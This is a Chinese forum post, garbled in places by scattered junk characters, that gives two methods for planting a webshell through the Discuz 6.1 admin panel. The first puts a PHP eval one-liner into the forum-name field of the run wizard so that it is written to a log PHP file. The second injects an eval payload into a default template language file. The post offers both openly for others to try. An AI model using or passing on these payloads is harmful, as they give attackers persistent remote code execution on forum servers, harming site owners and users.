discuz6.1两种方法后台拿shell
6 ^9 e1 x; W( t6 _( \* p2 F9 J+ Z好多朋友说discuz6.1后台不会拿shell,在前段时间这些都是说不公布的东西,我发出来给大家测试一下) V- p, V! t: s; U
1:
& Y$ c2 S5 `1 i1 f2 |- Z& Vhttp://127.0.0.1/discuz/admincp. ... zard&frames=yes9 u/ H0 g% a8 Q* w
admincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell) g( v3 Y6 Q( i0 z! |3 }2 L* H
<?php eval($_POST[cmd]);?>: ~* t: l/ B3 t1 ]2 `' d7 k. \; d
后台webshell地址:http://127.0.0.1/discuz/forumdata/logs/runwizardlog.php4 K( w- p7 G, g1 C7 x
/ a1 x c9 R1 N
: j0 |+ K ]9 D2 @. I6 K
2:后台模板管理--默认模板套系--详情/ e/ }2 t: l/ s" ^/ [
templates/default/actions.lang.php
9 ^! R- K0 ?4 c Cjhackj\\');eval($_POST[cmd])?>;//
$ J, q. D% i; b: T5 J6 h6 I. ?9 i% h2 t, W+ a3 D5 H' ~
利用很简单,聪明的人一看就懂了 |